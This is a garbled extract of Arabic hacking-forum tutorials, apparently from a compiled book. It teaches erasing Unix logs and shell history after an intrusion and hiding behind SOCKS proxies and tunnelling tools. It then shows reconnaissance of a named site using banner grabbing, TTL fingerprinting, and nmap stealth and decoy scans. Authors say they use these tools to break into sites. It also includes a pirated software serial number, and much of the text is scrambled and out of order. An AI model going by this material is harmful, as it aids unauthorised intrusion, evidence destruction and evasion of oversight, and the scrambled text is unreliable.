...‫"بين حماية الخصوصية وإزالة الثارمن ملفات الـ ‪"Logs‬‬ ‫>منقول من منتديات الحزم السلمية<‬ ‫>الكاتب‪ :‬حزم الظامي<‬ ‫فيما يتعلق بموضوع التخفي ومنع تعقب الثر مع سيرفرات يونكس أو لينوكس ‪ .‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ ... ( Unix‬يعني‬ ‫الفضل فهم يونيكس فحتمًا ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع ‪Unix‬‬ ‫أوًل أريد أقسم الموضوع لقسمين رئيسين ‪:‬‬ ‫ساتكلم عن كل واحد منهما بعجاله لن الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه ‪ ...‬‬ ‫‪96‬‬ ......‬أوًل لبد أن تعلم أن من أهم‬ ‫خواص يونكس التي تمنحه القوة ‪ .‬تقوم على تعدد المستخدمين ‪Unix Multi-User Mode .‬‬ ‫‪ ....‬بل وال‬ ‫اتوقع ان عمر ابن ادم يفنى وهو يبحث عن المن على النترنت وكل ما تقدم مستواه كل ما اصبح يعي تمامًا‬ ‫كل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب الثر ‪..‬وهذا يقف عن قدرات كل شخص فينا ‪.‬ملفاتك و جهاز كومبيوترك محمي‬ ‫بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية‪ ،‬ولكن‬ ‫حتى ولو حصل ذلك ففي غضون السابيع القليلة الولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة‬ ‫للستخدام الغير سليم لنترنت تتابع الشركات نظم التشغيل بشدة‪ ،‬الكل يتابع الثغرات في ‪Microsoft‬‬ ‫‪ Windows‬و ‪ Linux‬و ‪ Mac‬و غيرهما ‪ ،‬لذلك من الصعب الوصول الى تلك الجهزة بصورة فورية و‬ ‫بدون تدخل رسمي ‪. Operation‬ثم ل بد أن تعلم أن ) ‪( Linux‬هو الصدار المجاني من نظام يونيكس ) ‪ ...‬‬ ‫في الواقع جميع الجهزة في انترنت تجمع المعلومات عنك ‪ ،‬ابسطها مثل عنوان ال ‪ IP‬و اكثرها حساسية‬ ‫مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ‪ ...‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪( LOG File ) .

.‫والحقيقة انا لزلت في بداية طريقي لهذا المجال واسال ال ان يسهل ويفتح علينا من فضله ‪.‬‬ ‫ملفات سجل الداء‬ ‫تبعًا لمزّود الويب الذي تستخدمه‪ ،‬تحتوي ملفات سجل الداء‪ ،‬على بعض‪-‬ومن المحتمل جميع‪-‬المعلومات‬ ‫التالية‪ ،‬لكل زيارة يقوم بها زائر إلى موقعك‪:‬‬ ‫وأريد أخبرك ان ثمة ملفات ل يمكنك الووصول لها وهي تراقب كل اجراءاتك ‪ ..‬وإذا أخذت بعين العتبار أن مزّودات اليوم توّلد ملفات لسجل الداء‪ ،‬يصل حجمها إلى‬ ‫مستحي ً‬ ‫ميجابايتات كثيرة‪ ،‬بل ويصل في كثير من الحيان إلى جيجابايت أو أكثر‪ ،‬لدركت ببساطة أن التحليل اليدوي‬ ‫غير وارد إطلقًا‪.‬وتختلف الجراءات المنية‬ ‫من نظام لخر حسب قدرات مدير النظام الذي تعمل عليه ‪..‬‬ ‫‪97‬‬ .‬‬ ‫القسم الول ‪ :‬يخص ملفات النظام التي يسجل فيه اجراءاتك ‪.‬لكن إذا زاد حجم‬ ‫ملف سجل الداء )‪ (log file‬عن بضعة كيلو بايتات‪ ،‬فإن التحليل اليدوي يصبح غير عملي‪ ،‬إن لم يكن‬ ‫ل كليًا‪ ...‬‬ ‫ما يتعلق بملفات التسجيل لجراءاتك تسمى ) ‪ . ( LOG File‬مؤرخه بالوقت والجراء ‪..‬‬ ‫وتسمى سجل الحداث كما تسمى ملفات سجل الداء‬ ‫جل جميع مزّودات الويب )‪ (Web servers‬معلومات واسعة عن حركة الوصول إلى موقعك‪ ،‬ضمن‬ ‫تس ّ‬ ‫ملفات سجل الداء )‪ ،(log files‬وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزّود‪..‬‬ ‫ويمكن تحليل معلومات سجل الداء يدويًا‪ ،‬وهذا ما كان يفعله الناس‪ ،‬في بدايات شبكة ويب‪ .

‫اقتباس‪:‬‬ ‫عموما أخوي هيكس تكلم عن هذه الملفات في نظام ‪.‬‬ ‫‪bash_history.‬‬ ‫وهذا الملف يسجل به اخر ايبي سجل الدخول ‪..‬‬ ‫طيب وش الحل ننسفها نهائيًا وما نريد أوامر الحذف تظهر ‪.‬‬ ‫واذا مد ال في‬ ‫لحظ هذه الصورة ‪ :‬وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بل اي معلومات‬ ‫عن المصدر الحقيقي للتصال ‪.‬‬ ‫عموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل باليبي المحلي ‪localhost :‬‬ ‫العمر تكلمنا عن هذا الموضوع باذن ال ‪..‬‬ ‫باستخدام المر ‪ rm‬تلقائيًا راح يكون ناتج هذا الجراء تجدد ملف الباش ‪bash_history. WIN NT‬‬ ‫وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ‪.‬هي كالتالي ‪:‬‬ ‫‪lastlogin....bash_history‬‬ ‫‪rm ..‬‬ ‫‪98‬‬ ..‬‬ ‫بدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس ‪...‬وسرعة التنفيذ‬ ‫والستجابه هو في الصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها وال فالصل‬ ‫هو يونكس بل ادني شك ‪..‬‬ ‫هو كوني حذفت ملفي ‪lastlogin & ..bash_history‬‬ ‫وراح يكون ناتج ملف ‪ lastlogin..‬ويا حبذا تنسف معهم مجلد ‪.‬‬ ‫عموما أهم الملفات حاليًا أريدك تحذفها كل ما تستخدم الشل النصي ‪ ..‬‬ ‫اذا ما كنت تستخدم الشل النصي للتعامل مع البريد‬ ‫أيضًا أريد منك حذف هذين المجلدين‬ ‫‪ Tmp‬والخر ‪ trash.‬‬ ‫هنا راح تسجل جميع الوامر التي نفذتها‬ ‫‪contactemail.‬وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك من‬ ‫البداع ومن التجديد والبتكار ‪.bash_history..‬‬ ‫ليصبح محتواه ‪:‬‬ ‫‪rm .‬‬ ‫الطريقة تستخدم ‪ cpanel‬هو أفضل إجراء ‪ ....‬‬ ‫وانا الن راح اخبرك عن اهمها ول يشترط ان تزيل كل شي ‪:‬‬ ‫) فما ل يدرك كله ل يترك جله ( ودائمًا حتى ل تحبط ) إذا لم تستطع شيئًا فدعه وجاوزه إلى ما تستطيع (‬ ‫عموما الطريقه المثلى للتعامل مع انظمة يونكس ‪ .‬هي استخدام الشل النصي وهذا رأيي فأنا إلى الن اعيش‬ ‫في ذهول من قدرات هذا النظام العجوز ‪ .‬يكفي ان الدوس صاحب المكانيات والسهولة ‪ ..‬هو اليبي الذي دخلت به اخر مره ‪. etc‬‬ ‫هنا مشكلة ربما يعرفها البعض ‪.

..‬اشتغل ببروكسي يعمل مع بروتوكولت التصفح )‪ ( HTTP Protocol‬ويجب أن ندرك أنك‬ ‫حين تتعامل مع نظام يونيكس أو النظمة الخرى الشبيهه‬ ‫والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ل يخفي هويتك اذا استخدمت بروتوكولت‬ ‫‪ HTTP‬ولكن الحل المثل ‪ .. SOCKS Protocol‬فيجب عليك‬ ‫إيجاد ارقام سوكس لستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام ‪...‬‬ ‫وبالمقابل يتم مراقبة نظام ‪ UNIX‬عن طريق الرواتر ‪ Router .‬وان‬ ‫سهل ال ‪ .....‬وهذا يقف عن قدرات كل شخص فينا ‪. Protocol‬‬ ‫‪ .‬‬ ‫‪.‬ومواصفاتها وعناوينها الخاصة ‪. HTTP Protocol ....‬‬ ‫‪ Web Proxy Service (1‬وهذا للتصفح ‪. Socks Proxy Service (3‬وهذا القوى ويستفاد منه في )‪SSL) Secure Sockets‬‬ ‫‪ Layers‬بالضافة إلى )‪ IIS) Internet Information Server‬ويخدم مع ‪Windows NT‬‬ ‫وكذلك ‪ FTP ، Telnet، Gopher،IRC ، RealAudio ، POP3‬وهذا النوع يجمع بين كونه‬ ‫‪ firewall‬إضافة إلى خدمة أمنية ‪ . Finger.... DNS lookup.‬فوال تستطيع‬ ‫الحذف ‪.‬‬ ‫عموما البروكسيات في مجملها ثلثة أنواع ‪..‬‬ ‫وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ‪ .‬وعادة ما يستخدم فيها بروتوكول ‪ TCP/IP‬ويستخدم هذا البروتوكول وسيلتين للتصال‬ ‫‪:‬‬ ‫* طريقة المنظمة العالمية )‪(Internationa Organization for Standardization‬‬ ‫** مجموعة بروتوكولت للتصالت ‪ .‬‬ ‫ننتقل للجزء الخر ‪... Protocol TC‬‬ ‫الحقيقة أخواني هناك أمر هام جدًا وهو أن ثمة برامج تساعدك كثيرًا بتقنياتها المحترفة تساعدك في التخفي‬ ‫من تقنيات الرقابة التي ل يخلوا منها نظام ‪ ..‬‬ ‫‪ WinSock Proxy Service (2‬وهذا مفيد مع سيرفرات ‪ windows NT‬ويفيد في عملها على‬ ‫اخفاء هويتك عند العمل على بروتوكولت ‪ telnet‬أو ‪ FTP‬وهذا هو البروتوكول ‪WinSock‬‬ ‫‪... SNMP‬وهذا يكون باعتبار‬ ‫النظام واعتبار بروتوكول التصال الذي يستخدمه نظام ‪ ..‬‬ ‫‪99‬‬ .‬وضعتها وزارة الدفاع المريكية ‪ransmission Control ....‫عموما سأعود لهذا الموضوع اذا مد ال بالعمر وال اني اعمل من اشهر على كتابة دروس نظرية وتطبيق‬ ‫عملي لحتراف يونيكس ‪. LDAP. WIN NT :‬ويستفيد من وتوكول ‪TCP/IP‬‬ ‫لمراقبة النظام ‪.‬‬ ‫ويتميز هذا النوع بالمان ‪.......‬وهي كثر جدًا ‪:‬‬ ‫‪ Ping، Traceroute.‬‬ ‫وهنا نوعين للموجهات أو الموزعات )‪ .‬‬ ‫القسم الثاني ‪ :‬يتعلق باتصالك وحماية خصوصياتك ‪ .. securiy .‬‬ ‫أخوي الحقيقة المشكلة أن الغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه ‪ .‬وهو أداة فعاله لتشخيص النظام ونعني‬ ‫بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة‬ ‫ويعمل عى مراقبة الداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلليتها‬ ‫‪. Whois. ( Router‬الول ‪ :‬إستاتيكي يتطلب من مدير الشبكة ضبط يدوي ‪....‬أنك تستخدم بروكسيات السوكس ‪ ...‬وتكمن وظيفته في تغيير معلومات موارد خدمة النترنت‬ ‫التي تتصل بها ‪ ...

.‬‬ ‫وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟‬ ‫‪100‬‬ .‬وعليكم بمراقبة هذه البورتات ‪:‬‬ ‫‪Port 21 = FTP‬‬ ‫‪Port 23 = Telnet‬‬ ‫‪Port 25 = SMTP‬‬ ‫‪Port 53 = DNS‬‬ ‫‪Port 79 = Finger‬‬ ‫‪Port 80 = HTTP‬‬ ‫‪Port 110 = POP3‬‬ ‫‪Port 111 = SunRPC‬‬ ‫‪Port 139 = NetBIOS‬‬ ‫‪Port 443 = SSL‬‬ ‫‪Port 1080 = SOCKS‬‬ ‫‪Port 8181 = IMail‬‬ ‫والحقيقة الفضل من هذا كله أن تسجل دخولك باليبي المحلي أو لبد أن تستخدم بروكسيات من نوع سوكس‬ ‫‪.‬ويحتاج الى ضبط بسيط وهو أقل أمانًا من الول ‪....‬أنا أقول لكم عليكم‬ ‫بتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ‪ .‬ببرامج أو بدون ‪ ..‬‬ ‫وهناك برامج جيدة كالتالي ‪ :‬أفضلها في نظري أداءًا وسهولة ‪ ..‬عموما إخواني بالنسبة للتصال ‪ ....‬‬ ‫تقنية حديثة مرتبطة ببروتوكول التصال ‪ TCP/IP‬الخاص بشبكة النترنت‪ ،‬فقد صمم برنامج ‪HTTPort‬‬ ‫من أجل إخفاء الهوية الحقيقية عن الخرين وأيضا يتخطى المرشح(البروكسي ‪) Proxy Server‬التابع‬ ‫لمزود الخدمة ‪ ISP‬وأشبه ما يوصف بأنه برنامج يشغل برامج النترنت من تحت نفق وهمي يتجاوز‬ ‫الحواجز المنية )المرشح ) ‪ Proxy‬وليرتبط مع بروكسي آخر‪...‬‬ ‫وكما ذكرنا فان برنامج ‪ HTTPort‬بطريقة عمله يحقق حرية التصفح في شبكة النترنت وإخفاء هوية‬ ‫المستخدم ‪.‬يقوم بأعماله اتوماتيكيًا ‪.‬برنامج ‪ HTTPort‬ومعروف لديكم أكيد ‪..‬‬ ‫عموما انا اسف ربما تفرعت في هذا الموضوع ‪ .‬‬ ‫بل وستخدم ايضًا بروتوكول ‪ SOCKS‬ويقوم بدوره خير قيام فهو يخفي هويتك ول يمكن حتى لمسؤول‬ ‫الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ‪..‬‬ ‫صورة للبرنامج اناء عمله ‪.‫والثاني ديناميكي ‪ .

101 .

102 .

103 .

104 .

‫ سواءًا كان الفعلي أو‬. AOL.internet access easily 105 . . and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer.. HTTPS (secure web). FTP (file transfer). Netscape.and have them blocked and/or logged Log unauthorized port access attempts and secure internal servers from . and many more http://www. If you are running a special server of some sort.exe PortBlocker : ‫ويدعمه برنامج آخر اسمه‬ ‫يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة‬ : ‫تحركاتك وتسجيل معلوماتك‬ PortBlocker is configured to block the most common types of servers that might be on a system (FTP.... Microsoft !Messenger. HTTP. NNTP (newsgroups).. ‫ كيلو بايت إل أنه يخدم أكبر من حجمه بكثير جدًا‬18 ‫وهناك برنامج صغير ل يتعدى حجمه‬ AnalogX Proxy HTTP (web). : ‫فهو يدعم كل هذا‬ SMTP (send mail).analogx.. ‫هذا بالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة‬ ( Anonymous) ‫وهمي للتخفي‬ : ‫ واسمه‬. POP3 (recieve mail). so will not require any modification for most users. AOL Instant Messenger. etc). then you can easily add it's ports (either TCP or UDP) to it's list.com/files/proxyi.

and Socks protocols‬‬ ‫‪106‬‬ .analogx. FTP.‫حمل من هنا برنامج ‪PortBlocker‬‬ ‫‪http://www..mechanicalminds...‬‬ ‫‪Provides a space for you to type the address and port number of the‬‬ ‫‪proxy server you want to use to gain access to the Internet over HTTP.com/software/pla/setup.mechanicalminds.‬‬ ‫فأقدم لكم هذا البرنامج لكي تعرفوا كل ما تم تسجيله عنكم ول تنسوني من دعوة ‪ .‬لني متأكد ان الكم الهائل‬ ‫من المعلومات المرسلة والتقارير عنك وعن غيرك منتظمة وخفية ولكن آن لها أن تفضح ‪.exe‬‬ ‫‪ZIP archive instructions 818 kb‬‬ ‫‪http://www..com/files/pblocki.‬‬ ‫بالطبع كلكم تعلمون أن مايكروسوفت معروفة بطبعها التجسسي ‪.‬‬ ‫اسم البرنامج ‪Proxy Log Analyzer :‬‬ ‫صورة ‪:‬‬ ‫للتحميل ‪ MB 1.07 :‬بدون ضغط‬ ‫‪http://www.zip‬‬ ‫ناهيك عن أن المتصفح يسمح لك بتعبئة البيانات كما تحب ‪.com/software/pla/pla..Secure.exe‬‬ ‫والحقيقة أحمد ال الذي ذكرني بهذا البرنامج المميز وهو الذي يوضح لك كل المعلومات التي سجلت‬ ‫لمراقبتك أناء عملك على نظامك ‪. Gopher.‬‬ ‫‪..

.‬‬ ‫والطريقة سهله ‪ .‬‬ ‫‪107‬‬ ..‬اذهب افتح الماسنجر من قائمة ادوات خذ خيارات ‪.‫فقط استخدام العدادت المتقدمة للتصال ‪:‬‬ ‫حتى اليبي بالماسنجر بامكانك ترسل كل ملفاتك بل حصول أي انسان على اليبي الحقيقي لك ‪.

com/tv2/ssdd63/httport3snf........‫انتهى‪،،،‬‬ ‫"برنامج ‪ HTTP Port‬الذي يجعلك تتصفح النت متخفيا!!"‬ ‫>ةةةةة ةة ةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫اسم البرنامج‪:‬‬ ‫‪-----------------------‬‬‫‪HTTPort 3snf‬‬ ‫‪-----------------------‬‬‫الوظيفة‪:‬‬ ‫‪-----------------------‬‬‫برنامج لتصفح بسرية وأمان‬ ‫في النترنت‬ ‫ويريحك من البروكسيات الرقمية‬ ‫ومن البحث عنها‬ ‫‪.‬‬ ‫‪-----------------------‬‬‫وصلة التحميل‬ ‫‪-----------------------‬‬‫‪http://www....zip‬‬ ‫‪-----------------------‬‬‫الشرح‪:‬‬ ‫‪------------------------‬‬‫الشرح قام بشرحه أخي العزيز‬ ‫‪FAHAD‬‬ ‫ال يخليه ماخلى شي من خبراته إل وطرحه‬ ‫نــقـــــول بســــم ال‬ ‫الشكل الول‬ ‫‪108‬‬ ..angelfire.

‫واجهة البرنامج الرئيسية أضغط على الختيار الثالث فوق‬ ‫‪Port mapping‬‬ ‫الشكل الثاني‬ ‫أضغط على الختيار ‪Add‬‬ ‫سوف تضاف قائمة مثل التي في الشكل أسمها‬ ‫‪New mapping‬‬ ‫لين الحين كل شي تمام‬ ‫الشكل الثالث‬ ‫‪109‬‬ .

bt.‬الصلي‬ ‫‪110‬‬ ..net‬‬ ‫‪Remote port : 3128‬‬ ‫‪OKY MAN‬‬ ‫الشكل الرابع‬ ‫الن عد للختيار الثاني فوق ‪Proxy‬‬ ‫واكتب مكان الرقم واحد البروكسي الصلي لشتراكك‬ ‫سمعت ‪ ..‫هنا ياطويل العمر تكتب نفس الكلم والرقام المكتوبة زي كذا‬ ‫‪Local port : 80‬‬ ‫‪Remote host : webcache.

0.‫ومكان الرقم أثنين المنفذ‬ ‫وفي الخير ضغطه قوية على الزر‬ ‫‪Start‬‬ ‫ماخلصنا بقى الخطوة الخيرة‬ ‫الشكل الخامس‬ ‫من خيارات النترنت‬ ‫ضع البروكسي ‪127.‬‬ ‫انتهى‪،،،‬‬ ‫‪111‬‬ .0.1‬‬ ‫والمنفذ ‪80‬‬ ‫والحين روح للمتصفح وأدهر بكيفك‬ ‫وكيف نفسك بنفسك وما عليك رقيب إل ال عزوجل‪..

.‬‬ ‫هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة اليبي ماله ‪ .‬‬ ‫اسم البرنامج ‪..‬‬ ‫‪Neo Trace Express‬‬ ‫اتفضلوا الوصلة ‪..com/download/NTX325.‬او تريد‬ ‫تعرف معلومات عن موقع معين ‪...‬‬ ‫‪http://www.exe‬‬ ‫‪112‬‬ .neoworx.‫" شرح برنامج ‪" NeoTrace‬‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪< DarK_HaCKeR :‬‬ ‫برنامج يكشف كل شي عن صاحب اليبي‬ ‫مرحبا شباب ‪.

113 .

‫اتمنى ان الشرح وافي وهذا هو السيريل نمبر ‪:‬‬ ‫‪XDQG-2ZKN-X2PA-KTRQ‬‬ ‫انتهى‪،،،‬‬ ‫‪114‬‬ .

80‬‬ ‫ألحين نتصل على المنفذ ‪ 80‬عن طريق ‪ Telnet‬وبعدين نكتب المر التالي‬ ‫‪GET /qwe HTTP/1.com‬‬ ‫وبعد ارسال رسالة ليميل وهمي راح تستقبل رد ولما تعرض الـ ‪ Headers‬الخاص بالرسالة راح تلقي‬ ‫معلومات عن الموقع‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثالثة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫الـ ‪Banners‬‬ ‫ماهو البانر؟‬ ‫البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد‪.‫" كيفية القيام بجمع المعلومات عن موقع أو شبكة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫طرق جمع المعلومات لي موقع أو سيرفر أو شبكة أيا كانت ‪:‬‬ ‫=)الطريقة الولى(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من خلل زيارة موقع‬ ‫‪/http://www.kjgk'dgjbumpipt@almodammer.‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫‪115‬‬ .1 HTTP/1..1‬‬ ‫تقوم بتنفيذه ‪.1‬‬ ‫بعد كذا راح يخبرنا البانر بوجود صفحات الخطأ ‪400‬‬ ‫وراح تجيك معلومات هائلة عن الهدف‬ ‫وفيه عندك امر ثاني وهو‪:‬‬ ‫‪HEAD 127.almodammer..0.0.netcraft.‬‬ ‫وكيف راح نستغلها في كشف معلومات الموقع؟‬ ‫عن طريقة أداة ‪ Telnet Client‬عميل التلنت والطريقة هي أن تقوم بالتصال بأحد المنافذ سواء كان‬ ‫‪FTP 21‬‬ ‫أو‬ ‫‪TELNET 23‬‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الرابعة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي ‪HTTP‬‬ ‫‪Hyper Text Transfer Protocol‬‬ ‫ويعمل على المنفذ ‪8080 .com‬‬ ‫نقوم بإرسال رسالة ليميل وهمي وغير موجود مثل‬ ‫‪dfl.com‬‬ ‫وتكتب الموقع هناك وراح يعرض لك معلومات تفيدك كثير‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة الثانية(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي قديمة تستخدم حديثا لكني لادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو‬ ‫‪/http://www..

11 Intel 128‬‬ ‫‪AIX 4.x Intel 64‬‬ ‫‪FTX(UNIX) 3..x IBM/RS6000 60‬‬ ‫‪AIX 4.‬الخ(‬ ‫=============‬ ‫‪( Shadow Sceurity Scanner‬من أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم‬ ‫‪116‬‬ .x SGI 60‬‬ ‫‪FreeBSD 3.0 Alpha 60‬‬ ‫‪Unisys x Mainframe 64‬‬ ‫‪Linux 2.x Intel 64‬‬ ‫‪OpenBSD 2..2.‫=)الطريقة الخامسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫وهي من أمر ‪ ping‬الذي يقوم بإرسال عدة طلبات للـ ‪ ip‬أو للموقع ويقوم باستقبال الردود وبسرعة هائلة‬ ‫الحين كيف نستفيد منها في تحديد معلومات للموقع !‬ ‫حيث تقوم بوضع التالي‬ ‫‪ping ipsite‬‬ ‫‪ =ipsite‬الي بي الخاص بالموقع‬ ‫وراح يطلعلك عدة اسطر حنا مايهمنا ال كلمة‬ ‫‪TTL=XXX‬‬ ‫‪=XXX‬القيمة والعدد الي طلعلك‬ ‫بتقولي وش فايدته أقولك من خلله يمكن تحديد نظام التشغيل وهذي امثلة‪:‬‬ ‫‪Windows 9x/NT Intel 32‬‬ ‫‪Windows 9x/NT Intel 128‬‬ ‫‪Windows 2000 Intel 128‬‬ ‫‪DigitalUnix 4.x Intel 64‬‬ ‫‪Solaris 8 Intel/Spar 64‬‬ ‫‪Solaris 2.2.3.3 STRATUS 64‬‬ ‫‪SCO R5 Compaq 64‬‬ ‫‪Netware 4.2 7507 60‬‬ ‫‪Cisco 12.x IBM/RS6000 60‬‬ ‫‪Cisco 11.0 2514 255‬‬ ‫‪IRIX 6.x Intel/Sparc 255‬‬ ‫وقد يحدث اختلف في القيم حيث يكون الفرق يساوي واحد‬ ‫أي‪ :‬عند مرور ‪) data list or packet‬حزم او قائمة بيانات( بـ ‪ Nodes‬حيث أن ‪ TTL‬تنقص بـ ‪1‬‬ ‫لذلك عليك ان تستعمل أمر ‪ tracert‬في الويندوز أما ‪ traceroute‬فهو خاص باليونكس‬ ‫وهو امر خاص بعرض معلومات عن الشخص أو الموقع‬ ‫ويمكننا استخدامه بهذه الطريقة‬ ‫‪tracert ip‬‬ ‫‪ =ip‬عنوان الموقع أو السخص‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫=)الطريقة السادسة(=‬ ‫^^^^^^^^^^^^^^^^^^^‬ ‫عن طريقة الدوات والبرامج‬ ‫أول ‪ Windows‬لنه السهل‬ ‫يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغلل‬ ‫المنافذ بكثير من عمليات الختراق وسوف نطرق لها في الدرس الثاني‬ ‫تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا راح اذكر الفضل‬ ‫‪:‬‬ ‫‪) N-Stealth‬لتحديد معلومات عن الشبكة منها المنفذ ثغرات ‪.

Use '-' for stdinS /-e Specify source address or network interface.0.microsoft. or Null scan (experts only.1080.90 SEE THE MAN PAGE FOR MANY MORE OPTIONS.* (sP ping scan (Find any reachable machines(sF. DESCRIPTIONS.com/ and(others Ddecoy_host1.-sX.* (sR/-I RPC/Identd scan (use with other scan types:(Some Common Options (none are required.168..0/16 '192..com/ 192.* T General timing policyn/-R Never do DNS resolution/Always resolve [default: sometimes[resolve oN/-oX/-oG Output normal/XML/grepable scan logs toiL Get targets from file..* (sT TCP connect() port scan (default for unprivileged userssU UDP port scan..com ‫=الموقع المراد فحصه‬almodammer..decoy2[.-sN Stealth FIN.(‫الثغرات مع وجود شرح لكيفية علجها‬ ============= ‫ (برنامجي المفضل فأنا استخدمه لختراق المواقع والجهزة حيث يساعدني كثيرا في معرفة‬SuperScan (‫ كبيرة يمنك الضافة عليها كيفما شئت‬List ‫المنافذ المفتوح بالموقع والجهزة ويحتوي على‬ ------------------------------------------------------------------------Linux ‫الحين نجي على‬ ‫هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم‬ Nmap (‫ )مستكشف الشبكات‬Network Maper ‫اختصار لـ‬ ‫ وهو خاص للمتهمين‬Linux ‫وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ‬ ‫السيرفرات‬/‫المواقع‬/‫باختراق الشبكات‬ : ‫كيفية استمعاله‬ /‫ وراح تجد الكثير من الوامر الذي ظهرت مثل‬nmap ‫شغل‬ [l] Nmap V. most can be combined O Use TCP/IP fingerprinting to guess remote operating system. Use twice for greater effectP0 Don't ping hosts (needed to scan http://www.* 'p ports to scan. Its use is recommended.6666. 3. Example range: '1-1024.my..31337F Only scans ports listed in nmap-services.* (interactive Go into interactive mode (then press h for help-Example: nmap -v -sS -O http://www. ‫منها المنافذ والصدار والملقم والسيرفر‬ ^^^^^^^^^^^^^^^^^^^ =(‫=(الطريقة السابعة‬ 117 .‫ الخاص بالبرنامج‬man page ‫ولخلفية ومعلومات اكثر قم بالذهاب إلى‬ ‫لنشرح أهم أمر وهو‬ nmap -sS -O -vv almodammer.. Xmas.v Verbose. AND EXAMPLES !!!!!!!!! ‫وأيضا يحتوي العديد من الوامر المجهولة‬ ..00 Usage: nmap [Scan Type(s)] [Options] (Some Common Scan Types ('*' options require root privileges ((sS TCP SYN stealth port scan (default if privileged (root.*.88'*..com ‫وراح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز‬ .] Hide scan using many decoys..

..‫^^^^^^^^^^^^^^^^^^^‬ ‫تعتمد على وجود جهازك ‪ Linux‬أو ‪ Shell Account‬حتى تقدر تطبق اوامر اليونكس في الويندوز لكن‬ ‫لو تركب ‪ Linux‬أفضل لن ‪ Shell‬لزم يكون ممتاز وسعره مناسب علشان كذا لتتعب نفسك وركب‬ ‫‪ Linux‬وارتاح‬ ‫المهم هذا أمر ‪whois‬‬ ‫والي يوفره لنا ‪ Linux‬والويندوز كبرامج كبيرة وثقيلة وغير دقيقة‬ ‫ولمعلومات أكثر اضف المر‬ ‫‪man whois‬‬ ‫‪------------------------------------------------------------------‬‬‫أما عن طريق الويندوز فيمكنك البحث في ‪google‬‬ ‫‪http://www.com/search?q=whois&btnG=Google+Search‬‬ ‫والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و ‪ cgi‬تقوم بالبحث عن الموقع بإحدى الطرق التي‬ ‫ذكرتها مع اختلف بسيط وهي شبيهة بموقع ‪ netcraft‬الطريقة الولى‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪118‬‬ .....google........

‬ملف الثغرات‬ ‫‪ 1‬اسم الموقع المراد البحث عن ثغرات فيه‬ ‫و ل تنسى ‪//:http‬‬ ‫ملحظه ‪:‬‬ ‫ل تضع \ في نهايه الموقع مثل‬ ‫‪/http://www.com‬‬ ‫لنه سيضع من عنده ‪ /‬عند تطبيق الثغره‬ ‫‪ 2‬اسم ملف الثغرات‬ ‫‪ 3‬لتغيير ملف الثغرات إلى ملف آخر‬ ‫‪ 4‬الثغرات الموجوده في الملف‬ ‫‪119‬‬ .XXX.‫" برنامج عمران سكان للبحث عن الثغرات "‬ ‫>ةةةةة ةة ةةةة ةةةةةةةةةة<‬ ‫>ةةةةةة‪>P @ LH@CKERZ :‬‬ ‫برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير‬ ‫‪.

